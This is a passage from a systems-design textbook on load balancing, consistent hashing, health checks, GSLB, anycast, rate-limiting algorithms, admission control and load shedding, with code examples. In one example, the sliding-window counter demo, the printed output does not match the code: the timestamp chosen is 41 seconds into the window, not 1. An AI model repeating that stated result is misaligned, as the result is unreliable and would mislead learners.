Least response time goes one step further and ranks backends by a blend of in-flight count and observed latency (usually an exponentially weighted moving average). It catches a case least connections misses: a backend that is slow but lightly loaded, for example because it is serving a smaller share of a misconfigured weighted pool.
# Peak EWMA: the scoring most modern proxies use (Envoy, Linkerd, Finagle).
import time
class PeakEwma:
def __init__(self, decay_seconds=10.0):
self.rtt = {} # backend -> smoothed latency estimate (ms)
self.inflight = {} # backend -> current in-flight request count
self.decay = decay_seconds
def observe(self, backend, latency_ms):
prev = self.rtt.get(backend, latency_ms)
# Weight recent samples more heavily; a spike is reflected immediately,
# while recovery is only believed gradually.
alpha = 0.2
self.rtt[backend] = max(latency_ms, prev * (1 - alpha) + latency_ms * alpha)
def choose(self, backends):
# Cost estimate = what this request will likely wait for.
# Adding 1 accounts for the request we are about to send.
return min(backends,
key=lambda b: self.rtt.get(b, 1.0) * (self.inflight.get(b, 0) + 1))
lb = PeakEwma()
lb.inflight = {"A": 2, "B": 31, "C": 3}
lb.rtt = {"A": 20, "B": 340, "C": 25}
print(lb.choose(["A", "B", "C"])) # A -> score 60 vs B 10880 vs C 100
Two cautions apply in practice.
First, least connections needs an accurate in-flight count, which is easy for a single load balancer and hard for a fleet of them. Ten balancers each seeing only their own connections have ten partial views, and all ten may simultaneously conclude that the same idle backend is the least busy — a stampede onto the newest instance. Randomized choice among the best few, or "two random choices," fixes this cheaply.
Second, the fail-fast trap from the previous topic is real here too: a backend returning instant errors keeps a near-zero in-flight count and looks maximally attractive. Least response time with error-aware scoring — counting failures as very expensive rather than very fast — is the defense.
| Algorithm | Signal used | Good at | Weak at |
|---|---|---|---|
| Round robin | Nothing | Uniform workloads | Variable request cost |
| Least connections | In-flight count | Variable request cost | Multi-LB view splits; fail-fast nodes |
| Least response time | Latency + in-flight | Slow-but-idle backends | Needs tuning; reacts to noise |
| Two random choices | In-flight of two picks | Scale-out balancing | Slightly worse than a perfect view |
Key Takeaways
- Least connections measures actual backend load and adapts automatically to uneven request costs and slow backends.
- It works because in-flight count is Little's Law made observable.
- Least response time additionally catches backends that are slow without being busy.
- Both need error-aware scoring, or a fast-failing backend becomes the most attractive one.
🧪 Practice
- Compute the peak-EWMA scores for the table above after B's queue drains to 4 but its latency stays at 340 ms. Which backend is chosen?
- Explain why ten independent load balancers using least connections can stampede a newly added instance, and give a fix.
- Interview: When would you deliberately choose round robin over least connections? (Hint: think about what the extra state costs, and when the assumption it removes was true anyway.)
Hash-Based Routing
Sometimes you do not want an even spread — you want the same key to reach the same backend every time. That is hash-based routing: compute a hash of some request attribute (client IP, session ID, user ID, cache key) and use it to pick the backend deterministically.
The reason to want this is locality. If every request for user:42 lands on the
same instance, that instance's local cache stays warm, its open connections stay
reusable, and any per-user in-memory state stays valid. Hash routing turns a
fleet of interchangeable instances into a de facto partitioned system without a
coordinator.
The naive implementation is backend = hash(key) % N — and it has a
catastrophic flaw. Change N (add a server, lose a server) and almost every key
maps somewhere new. For a cache tier, that is a near-total cache flush at the
exact moment the system is already under stress.
MODULO HASHING: one node change remaps almost everything
N = 4: key "user:42" -> hash % 4 = 2 -> node C
N = 5: key "user:42" -> hash % 5 = 1 -> node B REMAPPED
~80% of all keys move.
CONSISTENT HASHING: a ring; only the departed node's keys move
node A
.-----*-----.
/ k1 \ Each key walks clockwise to the first
node D node B node it meets.
\ k2 /
'-----*-----' Remove node C: only the keys between B
node C and C move -- and they move to D alone.
Everything else is untouched.
Consistent hashing places both nodes and keys on a hash ring and assigns each
key to the next node clockwise. Adding or removing one node relocates only
1/N of the keys on average. Real implementations add virtual nodes: each
physical node is placed at many ring positions, which smooths out the uneven arc
lengths a handful of random placements would produce.
import hashlib, bisect
class ConsistentHashRing:
def __init__(self, nodes, vnodes=150):
# vnodes: more replicas per node -> smoother distribution.
# 150 is a common default; ~1% standard deviation across nodes.
self.vnodes, self.ring, self.keys = vnodes, {}, []
for node in nodes:
self.add(node)
def _hash(self, value):
return int(hashlib.md5(value.encode()).hexdigest()[:8], 16)
def add(self, node):
for i in range(self.vnodes):
h = self._hash(f"{node}#{i}") # many ring positions per node
self.ring[h] = node
bisect.insort(self.keys, h) # keep positions sorted for search
def remove(self, node):
for i in range(self.vnodes):
h = self._hash(f"{node}#{i}")
del self.ring[h]
self.keys.remove(h)
def get(self, key):
h = self._hash(key)
idx = bisect.bisect(self.keys, h) % len(self.keys) # walk clockwise,
return self.ring[self.keys[idx]] # wrapping at the end
ring = ConsistentHashRing(["A", "B", "C", "D"])
before = {f"user:{i}": ring.get(f"user:{i}") for i in range(10_000)}
ring.remove("C")
moved = sum(1 for k, v in before.items() if ring.get(k) != v)
print(f"{moved / 100:.1f}% of keys moved") # ~25% -- exactly C's share,
# versus ~80% under modulo
A refinement worth knowing is bounded-load consistent hashing, which caps how much load any single node may take: if a key's target node is already above its cap, the key overflows to the next node on the ring. This keeps a single viral key from melting one node while the rest idle — the hot-key problem that plain consistent hashing does nothing about.
Hash routing has one structural downside: it prioritizes affinity over balancing. If your key distribution is skewed, your load will be too. Use it where locality pays for itself (cache tiers, sharded stateful services, per-tenant workers) and use a load-aware algorithm everywhere else.
Key Takeaways
- Hash routing sends the same key to the same backend, preserving cache warmth and per-key state.
hash % Nremaps almost all keys when N changes; consistent hashing moves only about1/N.- Virtual nodes are what make consistent hashing distribute evenly in practice.
- Hash routing trades load balance for affinity, so hot keys become hot nodes unless you bound per-node load.
🧪 Practice
- Compute the fraction of keys remapped when going from 4 to 5 nodes under modulo hashing versus consistent hashing.
- Modify the ring class to return the top two nodes for a key, so a client can fail over without a full remap.
- Interview: A single celebrity user's key overloads one cache node. The ring is working exactly as designed. What do you change? (Hint: either the key stops being one key, or the node stops being allowed to take it all.)
Health Checks and Draining
A load balancer is only as good as its picture of which backends can serve traffic. Health checking builds that picture; draining is how a backend leaves the pool without dropping the requests it is already handling.
There are two kinds of health check and you want both. Active checks are
probes the balancer sends on a schedule — request a /healthz endpoint every
few seconds, mark the backend down after N consecutive failures, mark it up
again after M consecutive successes. Passive checks (outlier detection)
observe real traffic: if a backend returns a burst of 5xx or times out
repeatedly, eject it temporarily. Active checks catch a dead process; passive
checks catch a backend that answers probes fine but fails real requests.
The design of the health endpoint itself is where teams most often go wrong. The distinction that matters:
| Probe type | Question it answers | If it fails |
|---|---|---|
| Liveness | Is this process wedged? | Restart the instance |
| Readiness | Can it serve traffic right now? | Remove from the LB pool only |
| Startup | Has it finished initializing? | Wait; do not restart yet |
THE CASCADING HEALTH CHECK ANTI-PATTERN
Database has a brief hiccup
|
v
/healthz on EVERY instance queries the DB -> every check fails
|
v
LB marks the ENTIRE fleet unhealthy -> 100% of traffic rejected
|
v
DB recovers, but nothing is in the pool; instances restart, cold caches,
thundering herd back onto the DB -> the hiccup became a 20-minute outage.
Rule: a health check must report on the HEALTH OF THIS INSTANCE, not on
the health of its dependencies. If everything is equally sick, taking
everything out of rotation converts degradation into an outage.
// Liveness: cheap, local, no dependencies. Failing this means "restart me".
app.get('/livez', (req, res) => res.status(200).send('ok'));
// Readiness: local capacity only. Note what is deliberately NOT checked.
app.get('/readyz', (req, res) => {
if (shuttingDown) return res.status(503).send('draining');
if (!warmupComplete) return res.status(503).send('warming');
if (inFlight > MAX_INFLIGHT) return res.status(503).send('saturated');
// NOT checked here: database reachability, downstream APIs.
// If the DB is down, every instance is equally affected; removing them all
// helps nobody and prevents cached or degraded responses from being served.
res.status(200).send('ok');
});
// Draining: stop accepting NEW work, finish what is in flight.
process.on('SIGTERM', async () => {
shuttingDown = true; // /readyz now fails
await sleep(15_000); // KEY: wait for the LB to notice
// (check interval x threshold)
server.close(() => process.exit(0)); // then finish in-flight requests
});
That sleep before server.close() is the detail almost everyone misses. The
load balancer learns a backend is unready only on its next few probes. If the
process stops listening the instant it receives SIGTERM, every request the
balancer sends during that window is refused. The correct order is: fail
readiness → wait longer than the balancer's detection window → stop accepting
new connections → finish in-flight work → exit.
Tuning the probe parameters is a trade-off between detection speed and stability. Aggressive settings (1 s interval, 1 failure) eject healthy backends during a GC pause; slow settings (30 s interval, 5 failures) leave a dead backend receiving traffic for over two minutes. A common starting point is a 5-second interval with a 2-second timeout, 3 failures to eject and 2 successes to restore, which detects a genuine failure in roughly 15 seconds without reacting to transient blips.
Key Takeaways
- Use active probes to find dead processes and passive outlier detection to find backends that fail real requests.
- Separate liveness (restart me) from readiness (stop sending me traffic).
- Never fail a health check because a shared dependency is down — it converts partial degradation into a total outage.
- Draining must fail readiness first and wait out the balancer's detection window before the process stops listening.
🧪 Practice
- With a 5-second interval and 3 failures to eject, compute the worst-case time a dead backend keeps receiving traffic.
- Write a readiness endpoint for a service that needs a warm local cache before it can meet its latency target.
- Interview: A deploy causes a burst of 502s even though the new instances are healthy. What is the likely cause? (Hint: look at what the old instances did the moment they received SIGTERM.)
Global Server Load Balancing
Everything so far balances traffic inside one region. Global server load balancing (GSLB) decides which region a user reaches in the first place.
There are two reasons to care. The first is latency: the speed of light imposes roughly 100 ms of round trip between continents, and no amount of backend optimization recovers it — sending a European user to a European region is the single largest latency win available. The second is availability: if a whole region fails, something must move its users elsewhere, and that decision cannot be made by a load balancer inside the failed region.
GSLB is implemented in one of three ways, and they differ mostly in how fast they can fail over:
| Mechanism | How it routes | Failover speed | Client IP visibility |
|---|---|---|---|
| DNS-based | Returns different IPs per resolver | Slow (TTL + caching) | Only the resolver's |
| Anycast | Same IP announced from many sites; BGP picks | Seconds (route withdrawal) | Full |
| HTTP redirect | 302 to a regional hostname | Immediate | Full |
DNS-BASED GSLB WITH HEALTH-AWARE ANSWERS
user in Frankfurt user in Oregon
| |
v v
resolver asks: app.example.com? resolver asks: app.example.com?
| |
v v
+--------------------- GSLB authority ---------------------+
| geo/latency table + per-region health from real probes |
+----------------------------------------------------------+
| |
v v
52.x.x.x (eu-central) 34.x.x.x (us-west)
| |
[ regional LB ] [ regional LB ]
| |
[ instances ] [ instances ]
If eu-central fails health checks, the authority stops handing out its IP.
Existing clients keep using the cached answer until the TTL expires --
which is why GSLB TTLs are short (30-60 s) and why DNS alone is never a
complete failover story.
The routing policies available at the global layer are worth distinguishing, because they answer different questions:
- Geolocation: route by where the user is. Predictable, and required for data-residency rules ("EU users must be served from the EU").
- Latency-based: route by measured network latency, which is not the same as geographic distance — network topology often makes a farther region faster.
- Weighted: send a fixed percentage to each region. The mechanism behind gradual migrations and multi-region canaries.
- Failover: an ordered list; secondary regions receive traffic only when the primary is unhealthy.
# Sizing multi-region capacity: the question GSLB forces you to answer.
regions = {"us-east": 40_000, "eu-central": 25_000, "ap-south": 15_000} # rps
total = sum(regions.values())
for lost in regions:
survivors = {r: v for r, v in regions.items() if r != lost}
# Assume the failed region's traffic is spread across survivors in
# proportion to their normal share.
absorbed = {r: v + regions[lost] * v / sum(survivors.values())
for r, v in survivors.items()}
peak = max(absorbed.values())
print(f"lose {lost:<11} -> busiest survivor must serve {peak:,.0f} rps "
f"({peak / regions[max(survivors, key=survivors.get)]:.2f}x normal)")
# lose us-east -> busiest survivor must serve 50,000 rps (2.00x normal)
# lose eu-central -> busiest survivor must serve 58,182 rps (1.45x normal)
# lose ap-south -> busiest survivor must serve 49,231 rps (1.23x normal)
#
# "Active-active across three regions" means every region must be able to run
# at up to 2x its normal load -- or you must accept shedding during failover.
That calculation is the real content of a multi-region strategy. Regional failover only works if the surviving regions have somewhere to put the traffic; otherwise failover simply moves the outage.
Key Takeaways
- GSLB chooses a region; regional load balancers choose an instance.
- DNS-based GSLB is universal but fails over only as fast as TTLs and resolver caches allow; anycast fails over at BGP speed.
- Routing policies answer different questions: geolocation for residency, latency for performance, weighted for migrations, failover for DR.
- Multi-region failover requires pre-provisioned headroom in the surviving regions — compute it explicitly.
🧪 Practice
- With a 60-second DNS TTL, what is the realistic worst case for a client to stop using a failed region, and why is it longer than 60 seconds?
- Design GSLB policy for a service that must keep EU user data in the EU but wants the lowest latency for everyone else.
- Interview: You run active-active in two regions, each at 65% utilization. What happens when one fails? (Hint: add the two numbers before answering.)
Anycast Routing
Anycast is a routing trick with a strange premise: announce the same IP address from many locations at once, and let the internet's own routing protocol deliver each packet to whichever location is nearest in network terms.
Normally an IP address identifies one destination (unicast). With anycast, dozens or hundreds of sites announce the same prefix via BGP, and every router along the way independently picks the best path it knows. A user in Tokyo and a user in São Paulo type the same IP and land on different continents, with no DNS trickery, no redirect, and no per-user decision anywhere.
The analogy is a chain of stores that all share one phone number, where the phone network connects you to the nearest branch automatically. Nobody looks up a branch number; the network's own routing does the selection.
ANYCAST: one prefix, many origins
Tokyo user São Paulo user
| |
[ ISP routers pick the shortest BGP path they see ]
| |
v v
+-----------+ +-----------+
| Tokyo PoP | | GRU PoP | Both announce 198.51.100.0/24
+-----------+ +-----------+
A PoP fails -> it withdraws the BGP announcement -> routers converge on
the next-nearest PoP within seconds. No DNS TTL, no client change.
Anycast has three properties that make it the backbone of DNS root servers, public resolvers, and every large CDN:
- Automatic proximity routing with no lookup step and no client cooperation.
- Fast failover. Withdrawing a route reconverges in seconds, not TTLs.
- DDoS absorption. An attack from many sources is delivered to many PoPs by the routing system itself, splitting the flood across the whole footprint instead of concentrating it on one target.
The catch is that BGP chooses paths by policy and AS-path length, not by latency. "Nearest" means nearest in routing terms, which is frequently not the nearest geographically or the fastest in milliseconds. Anycast gets you close; it does not get you optimal.
The subtler catch is statefulness. BGP can reconverge mid-connection and send subsequent packets of the same TCP flow to a different PoP, which has no knowledge of that connection and resets it. In practice this is rare and short-lived, and it is why anycast is a natural fit for:
| Workload | Anycast suitability |
|---|---|
| DNS (single-packet UDP) | Ideal — no connection state to lose |
| CDN edge / TLS termination | Very good — flows are short, resets are rare |
| Long-lived WebSockets | Risky — a reroute drops the connection |
| Multi-hour uploads | Poor — use unicast regional endpoints |
ANYCAST vs DNS-BASED GSLB
Anycast DNS GSLB
Selection made by BGP routers Authoritative DNS server
Granularity Network path Per resolver (not per user)
Failover time Seconds (reconvergence) TTL + resolver cache (minutes)
Control over choice Coarse (BGP policy) Fine (geo, latency, weights)
Requires Own AS + IP space Nothing special
Connection safety Reroutes can reset Stable once resolved
Large providers use BOTH: anycast for the edge, DNS for coarse steering
and for pulling whole regions out of service deliberately.
The operational barrier is that anycast requires running your own autonomous system with provider-independent address space and BGP peering — which is why most teams consume anycast through a CDN or cloud provider rather than operating it themselves.
Key Takeaways
- Anycast announces one IP from many locations and lets BGP route each user to a nearby site with no lookup step.
- It gives fast failover through route withdrawal and spreads DDoS traffic across the whole footprint.
- BGP optimizes for path policy, not latency, so "nearest" is approximate.
- Route changes can break long-lived connections; anycast suits DNS and short HTTP flows best.
🧪 Practice
- Explain why anycast is a near-perfect fit for DNS but a poor fit for a multi-hour file upload.
- Describe how anycast changes the economics of a volumetric DDoS attack.
- Interview: A user in Toronto reports being served from London instead of Montreal. Is anycast broken? (Hint: what does BGP actually minimize?)
<a id="63-traffic-control"></a>
6.3 Traffic Control
Load balancing decides where work goes. Traffic control decides how much work is allowed in at all — because every system has a capacity, and the behaviour of a system past that capacity is a design choice, not an accident.
Rate Limiting Algorithms
A rate limiter enforces a cap on how much a client may ask for in a period: 100 requests per minute, 10 uploads per hour, 5 login attempts per 15 minutes. It is the most basic form of traffic control and it serves three distinct purposes that are worth keeping separate, because they imply different limits:
- Protection. Keep one client from consuming capacity that belongs to everyone (accidental retry storms, runaway scripts).
- Fairness. Give each tenant a predictable share in a multi-tenant system.
- Business policy. Enforce plan tiers — free users get 1,000 calls a day, enterprise gets 1,000,000.
Before choosing an algorithm, three questions decide the design.
What is the limit keyed on? API key, user ID, IP address, or endpoint. IP is the weakest key: it punishes everyone behind a corporate NAT and is trivially evaded with a botnet. Authenticated identity is far better where you have it.
Where is it enforced? At the edge (gateway), where it protects everything behind it and rejects cheaply; or in the service, where it can see costs the gateway cannot. Serious systems do both.
Is the counter local or shared? A local counter on each of N instances means the effective limit is N times the configured one. A shared counter is accurate but adds a network round trip and a dependency to every request.
LOCAL vs SHARED COUNTERS
Limit: 100 rps per API key, fleet of 10 instances
LOCAL each instance allows 100 -> real limit is 1000 rps
(fast, no dependency, WRONG by a factor of N)
SHARED all instances INCR the same Redis key -> real limit 100
(correct, but +1 ms and a hard dependency per request)
HYBRID each instance takes a LEASE of 10 rps from Redis every
few seconds and enforces locally -> approximately
correct, one round trip per lease instead of per request
A rate limiter must also tell the client what happened, and there is a standard
vocabulary for it. Returning 429 Too Many Requests without a Retry-After is
an invitation for the client to retry immediately and make things worse.
HTTP/1.1 429 Too Many Requests
Retry-After: 30 ; seconds -- tells the client to back off
RateLimit-Limit: 100 ; the quota for the window
RateLimit-Remaining: 0 ; what is left
RateLimit-Reset: 30 ; seconds until the quota refills
# The decision surface of a rate limiter, before any algorithm is chosen.
LIMITS = {
# key pattern limit window scope rationale
("free", "GET /*"): (1_000, 3600, "api_key"), # business policy
("free", "POST /*"): ( 60, 3600, "api_key"), # writes cost more
("*", "POST /login"): (5, 900, "ip+user"), # credential stuffing
("*", "POST /export"): (2, 3600, "api_key"), # protects a heavy job
}
# Note that one number per client is almost never right: an endpoint that
# writes to the database is not interchangeable with one that reads a cache.
# Limits should track the COST of the work, not merely the request count.
Finally, distinguish rate limiting from throttling and load shedding, which appear later in this subchapter. Rate limiting is per-client and policy-based — it rejects you because you exceeded your quota, regardless of whether the system is busy. Load shedding is global and condition-based — it rejects requests because the system is overloaded, regardless of whose they are. You need both, and confusing them produces limiters that stay wide open during an overload or reject good traffic on an idle system.
Key Takeaways
- Rate limits serve protection, fairness, and business policy; be explicit about which one a given limit is for.
- Key limits on authenticated identity where possible; IP-based limits punish shared egress and are easy to evade.
- Local counters multiply the real limit by the instance count; shared counters are accurate but add a dependency per request.
- Always return
429withRetry-Afterand quota headers, and set limits by the cost of the work, not just request count.
🧪 Practice
- Your limit is 1,000 rpm per key, enforced locally on 12 instances. What is the actual limit a client experiences, and give two ways to fix it.
- Design limits for a public API with free and paid tiers, one expensive export endpoint, and a login endpoint. Justify each key and window.
- Interview: A customer says they are rate-limited at well under their quota. List three plausible causes. (Hint: consider what "one client" means when they run 40 pods behind one NAT gateway, and which key you chose.)
Token Bucket and Leaky Bucket
Token bucket and leaky bucket are the two classic rate-limiting algorithms. They are often confused because both use a bucket metaphor, but they answer different questions and produce visibly different behaviour.
Token bucket models permission. A bucket holds up to capacity tokens and
refills at a steady rate. Each request removes one token; if the bucket is
empty, the request is rejected or must wait. Because tokens accumulate while the
client is idle, a client that has been quiet can spend the saved tokens in a
burst — which is usually what you want, since real clients are bursty and a
limiter that forbids all bursts feels broken.
Leaky bucket models pacing. Requests enter a queue and drain at a fixed rate, like water leaking from a bucket with a hole. Output is perfectly smooth regardless of how bursty the input was; if the queue is full, new requests are dropped. It protects a downstream system that genuinely cannot absorb bursts.
TOKEN BUCKET LEAKY BUCKET
tokens drip in at rate R requests pour in (bursty)
| |
v v
+-----------+ +-----------+
| ooooo | capacity C | rrrrr | queue size Q
+-----------+ +-----------+
| |
request takes 1 token drains at fixed rate R
| |
v v
allowed / 429 perfectly smooth output
Idle time ACCUMULATES tokens Idle time accumulates NOTHING
-> bursts up to C are allowed -> output is never bursty
-> output is bursty -> latency is added by queuing
import time
class TokenBucket:
"""Allows bursts up to `capacity`, sustained rate of `rate` per second."""
def __init__(self, rate, capacity):
self.rate, self.capacity = rate, capacity
self.tokens = float(capacity) # start full: a fresh client may burst
self.last = time.monotonic()
def allow(self, cost=1):
now = time.monotonic()
# Lazy refill: no background timer needed. Compute how many tokens
# accrued since the last call, capped at the bucket size.
self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
self.last = now
if self.tokens >= cost:
self.tokens -= cost # `cost` lets expensive calls charge more
return True
return False
bucket = TokenBucket(rate=10, capacity=50) # 10 rps sustained, 50-request burst
print(sum(bucket.allow() for _ in range(80))) # 50 -> the burst allowance
time.sleep(1)
print(sum(bucket.allow() for _ in range(80))) # ~10 -> the refill in 1 second
class LeakyBucket:
"""Smooths output to exactly `rate`; excess beyond `size` is dropped."""
def __init__(self, rate, size):
self.rate, self.size = rate, size
self.level = 0.0 # how full the queue currently is
self.last = time.monotonic()
def allow(self):
now = time.monotonic()
# Drain first: the bucket has been leaking since the last request.
self.level = max(0.0, self.level - (now - self.last) * self.rate)
self.last = now
if self.level + 1 <= self.size:
self.level += 1
return True
return False # bucket overflows -> drop
| Property | Token bucket | Leaky bucket |
|---|---|---|
| Bursts | Allowed, up to capacity | Never |
| Output shape | Bursty then rate-limited | Perfectly constant |
| Idle credit | Accumulates tokens | None |
| Adds latency | No (reject or pass immediately) | Yes, when queuing |
| State per client | Two floats | Two floats (or a real queue) |
| Typical use | Public API quotas | Protecting a fragile downstream |
Two practical notes. First, token bucket's cost parameter is underused: charge
a search request 5 tokens and a cached lookup 1, and the limit finally reflects
real capacity instead of request count. Second, in a distributed setting the
lazy-refill formulation is what makes token bucket cheap to implement in Redis —
you store (tokens, last_refill) and update both atomically in a small Lua
script, so no background process is needed.
Key Takeaways
- Token bucket allows saved-up bursts and enforces a sustained average; it is the right default for API quotas.
- Leaky bucket produces perfectly smooth output and adds queuing latency; use it to protect something that cannot tolerate bursts.
- Both are implemented with two numbers and lazy refill — no timers required.
- Weight requests by cost so the limit reflects work, not request count.
🧪 Practice
- A token bucket has rate 5/s and capacity 100. A client is idle for a minute then sends 200 requests instantly. How many succeed, and why?
- Implement token bucket as a Redis Lua script so the check-and-decrement is atomic across instances.
- Interview: Your API allows 100 requests/minute. A client sends all 100 in the first second every minute and overloads a downstream service. Which algorithm fixes this, and what does the client lose? (Hint: which one refuses to let bursts exist at all?)
Fixed and Sliding Window Counters
Window counters are the other family of rate limiters — the ones that count
events inside a time window rather than modelling a bucket. They are popular
because they map directly onto a Redis INCR and onto how limits are usually
expressed ("1,000 requests per hour").
Fixed window divides time into aligned buckets — 10:00:00-10:00:59, 10:01:00-10:01:59 — and counts requests in the current one. It is trivial to implement and has one well-known flaw: a client can send a full window's worth of requests at the end of one window and another full window's worth at the start of the next, achieving twice the limit across a period shorter than one window.
THE FIXED-WINDOW BOUNDARY BURST (limit: 100/minute)
window 1: 10:00:00 --------------------------- 10:00:59
[100 requests at 10:00:59]
window 2: 10:01:00 --------------------------- 10:01:59
[100 requests at 10:01:00]
Both windows are within their limit. But in the 2 seconds spanning the
boundary the client sent 200 requests -- 2x the intended rate.
Sliding window log fixes this exactly: store a timestamp for every request, and on each new request drop the timestamps older than the window and count what remains. It is perfectly accurate and costs memory proportional to the limit — a 10,000/hour limit means storing up to 10,000 timestamps per client, which for a million clients is untenable.
Sliding window counter is the compromise everyone actually ships. Keep the count for the current window and the previous one, and estimate the rate by weighting the previous window by how much of it the sliding window still covers.
import time
def sliding_window_counter(prev_count, curr_count, limit, window, now):
"""Weighted estimate: accurate to within a few percent, O(1) memory."""
elapsed = now % window # seconds into the current window
prev_weight = (window - elapsed) / window # how much of prev is still in view
estimate = prev_count * prev_weight + curr_count
return estimate < limit, estimate
# The boundary-burst scenario that defeats a fixed window:
LIMIT, WINDOW = 100, 60
now = 1_000_000 + 1 # 1 second into the new window
ok, est = sliding_window_counter(prev_count=100, curr_count=0,
limit=LIMIT, window=WINDOW, now=now)
print(f"allowed={ok} estimate={est:.1f}")
# allowed=False estimate=98.3
#
# The previous window's 100 requests still count for 59/60 of their weight,
# so the client is correctly refused. A fixed window would have allowed 100 more.
# Redis implementation: two keys, one round trip, O(1) memory per client.
LUA = """
local curr_key, prev_key = KEYS[1], KEYS[2]
local limit, window, elapsed = tonumber(ARGV[1]), tonumber(ARGV[2]), tonumber(ARGV[3])
local curr = tonumber(redis.call('GET', curr_key) or '0')
local prev = tonumber(redis.call('GET', prev_key) or '0')
local estimate = prev * ((window - elapsed) / window) + curr
if estimate >= limit then
return {0, math.floor(estimate)} -- rejected, report the estimate
end
redis.call('INCR', curr_key)
redis.call('EXPIRE', curr_key, window * 2) -- keep it one extra window for the
return {1, math.floor(estimate) + 1} -- next window's weighting
"""
| Algorithm | Accuracy | Memory per client | Boundary burst |
|---|---|---|---|
| Fixed window | Poor at boundaries | One counter | Up to 2x limit |
| Sliding window log | Exact | One entry per request | None |
| Sliding window counter | Within a few percent | Two counters | Effectively none |
| Token bucket | Exact for the model | Two floats | Bounded by capacity |
The choice between sliding window counter and token bucket is mostly about how you want bursts to behave. Token bucket says "you may save up to C requests and spend them at once." Sliding window says "you may never exceed N in any N-window, period." For public API quotas the token bucket is friendlier; for abuse prevention the sliding window's strictness is the point.
Key Takeaways
- Fixed windows are trivial but allow up to twice the limit across a window boundary.
- Sliding window logs are exact but store one entry per request — unusable at high limits.
- The weighted sliding window counter gives near-exact behaviour with two counters and is the usual production choice.
- Window counters forbid bursts; token buckets permit bounded ones. Pick by whether bursts are abuse or normal client behaviour.
🧪 Practice
- With a limit of 60/minute, construct the exact request pattern that gets the most requests through a fixed window in a 10-second period.
- Compute the memory needed for a sliding window log with a 10,000/hour limit across 500,000 active clients, and explain why that rules it out.
- Interview: How would you rate-limit an API across 30 gateway instances with sub-millisecond overhead and no more than ~5% error? (Hint: perfect accuracy per request costs a round trip — what can each instance be given in advance?)
Throttling and Admission Control
Rate limiting answers "has this client exceeded its quota?" Admission control answers a harder question: "does the system have capacity to serve this request at all?" The distinction matters because a system can be overloaded while every individual client is within quota — for instance when the number of clients doubles.
The reason admission control exists is that queueing systems degrade catastrophically, not gracefully, past saturation. As utilization approaches 100%, queueing delay does not rise linearly; it rises hyperbolically. The result is that accepting a little too much work does not make the system a little slower — it makes it unusable.
QUEUEING DELAY vs UTILIZATION (M/M/1: wait ~ rho / (1 - rho))
wait | *
| *
| *
| *
| *
| * *
| * *
+---------------------------------------------> utilization
10% 30% 50% 70% 80% 90% 95% 99%
50% -> 1x service time 90% -> 9x
80% -> 4x 99% -> 99x
This is why "we are only 15% over capacity" is never a small problem, and
why the target utilization for a latency-sensitive service is 60-70%, not 95%.
Admission control means deciding, at the door, whether to let a request in. There are three signals to decide on, in increasing order of quality:
| Signal | Measures | Weakness |
|---|---|---|
| CPU / memory | Resource use | Misses I/O-bound saturation entirely |
| Concurrency (in-flight) | Little's Law load | Needs a known good limit |
| Latency vs target | Actual user experience | Reacts after degradation starts |
The most robust designs use adaptive concurrency limiting: rather than configuring a fixed maximum, continuously estimate the concurrency at which latency starts to degrade, and admit up to that. This is TCP congestion control applied to requests — probe upward while things are fast, back off sharply when latency rises.
# Adaptive concurrency limit, in the style of Netflix's concurrency-limits
# and Envoy's adaptive concurrency filter (AIMD: additive increase,
# multiplicative decrease).
class AdaptiveLimiter:
def __init__(self, initial=20, min_limit=4, max_limit=1000):
self.limit = initial
self.min_limit, self.max_limit = min_limit, max_limit
self.inflight = 0
self.best_rtt = float('inf') # the no-queue baseline latency
def try_acquire(self):
if self.inflight >= self.limit:
return False # admission DENIED -> 503 immediately
self.inflight += 1
return True
def release(self, rtt_ms, dropped=False):
self.inflight -= 1
self.best_rtt = min(self.best_rtt, rtt_ms) # baseline = fastest seen
if dropped or rtt_ms > self.best_rtt * 2:
# Latency has doubled: we are queueing. Back off hard.
self.limit = max(self.min_limit, self.limit * 0.9)
elif self.inflight >= self.limit * 0.9:
# We are near the limit and still fast -> there may be more room.
self.limit = min(self.max_limit, self.limit + 1)
# The key insight: the limit is DISCOVERED, not configured. It adapts when a
# dependency slows down, when instance size changes, or when the workload mix
# shifts -- all situations that make a hand-tuned constant wrong.
Two design rules make admission control worth having:
Reject fast and cheap. A rejection that costs a database query is not protection. Admission checks belong before authentication lookups, before deserialization of large bodies, and ideally at the edge proxy.
Reject with the right signal. 503 Service Unavailable with Retry-After
tells clients the system is overloaded; 429 tells them they specifically are
over quota. Clients (and their retry libraries) behave differently in response,
and mislabeling causes well-behaved clients to retry when they should back off.
Key Takeaways
- Rate limiting is per-client quota; admission control is system-wide capacity.
- Queueing delay grows hyperbolically near saturation, so exceeding capacity slightly produces disproportionate latency.
- Concurrency and latency are better admission signals than CPU, especially for I/O-bound services.
- Adaptive limiters discover the safe concurrency instead of relying on a hand-tuned constant; reject early, cheaply, and with the correct status code.
🧪 Practice
- Using
wait = rho / (1 - rho), compute the queueing multiplier at 85%, 95%, and 98% utilization, and explain the target you would set.- Extend
AdaptiveLimiterto keep a small reserved share of the limit for health checks and internal traffic.- Interview: Where in the request path do you put an admission check, and what must be true of it? (Hint: whatever the check costs, you pay it on every request you are trying to not do work for.)
Load Shedding
Load shedding is admission control's blunt sibling: when the system is over capacity, deliberately drop some work so the rest can be served correctly. The name comes from power grids, where controlled blackouts in one district prevent an uncontrolled collapse of the entire network.
The reason shedding beats the alternative is arithmetic. A system at 150% of capacity that accepts everything serves 100% of requests slowly and badly — often so slowly that clients time out, retry, and push the load to 200%. The same system shedding one third of requests serves two thirds of them perfectly and fails the rest immediately, which is both a better outcome and a stable one.
WITHOUT SHEDDING (metastable failure) WITH SHEDDING
load 150% of capacity load 150% of capacity
| |
all requests queue 33% rejected in <1 ms
| |
latency exceeds client timeouts 67% served at normal latency
| |
clients retry -> load becomes 200% clients back off on 503
| |
goodput collapses toward ZERO goodput stays at 100% of
and stays there after load drops capacity, recovers instantly
The left path is a "metastable failure": the system stays broken even
after the original trigger goes away, because retries now sustain it.
The critical property of the right-hand path is goodput — successfully completed work — as distinct from throughput. Under overload without shedding, throughput stays high while goodput approaches zero, because everything the system produces arrives after the client gave up.
Shedding well means shedding selectively. Dropping requests at random wastes the capacity you saved on low-value work. The dimensions to prioritize on:
| Dimension | Shed first | Keep |
|---|---|---|
| Criticality | Analytics, prefetch, recommendations | Checkout, auth, payments |
| Client class | Free tier, bulk API | Paid tier, interactive users |
| Request age | Already past its deadline | Fresh requests |
| Retry status | Retries (they had a chance) | First attempts |
| Cost | Expensive queries | Cheap cached reads |
